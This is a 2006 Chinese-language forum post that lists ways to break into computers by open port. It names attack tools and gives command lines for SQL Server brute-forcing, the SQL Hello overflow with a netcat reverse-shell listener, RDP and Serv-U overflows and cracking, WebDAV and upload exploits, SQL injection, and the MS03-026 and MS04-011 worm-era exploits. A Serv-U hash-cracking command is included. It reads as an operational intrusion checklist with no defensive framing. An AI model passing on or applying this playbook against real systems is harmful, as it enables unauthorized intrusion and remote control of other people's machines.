查看單個文章
舊 2006-05-29, 03:46 AM   #2 (permalink)
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

1. 1433連接阜入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
=============================
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機連接阜 sqlhelloF.exe 入侵ip 1433 本機ip 本機連接阜
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)

2. 4899連接阜入侵
用4899過濾器.exe,掃瞄空口令的機器

3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)

4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行注入。(小榕的注入軟件)。

5. serv-u入侵(21連接阜)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本機提升權限。(servlocal.exe)
======================================
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554連接阜
用real554.exe入侵。

7. 6129連接阜
用DameWare6129.exe入侵。

8. 系統漏洞
利用135、445連接阜,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。

9. 3127等連接阜
可以利用doom病毒開的連接阜,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

所涉及到的工具,自己去網上請教google老師吧
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次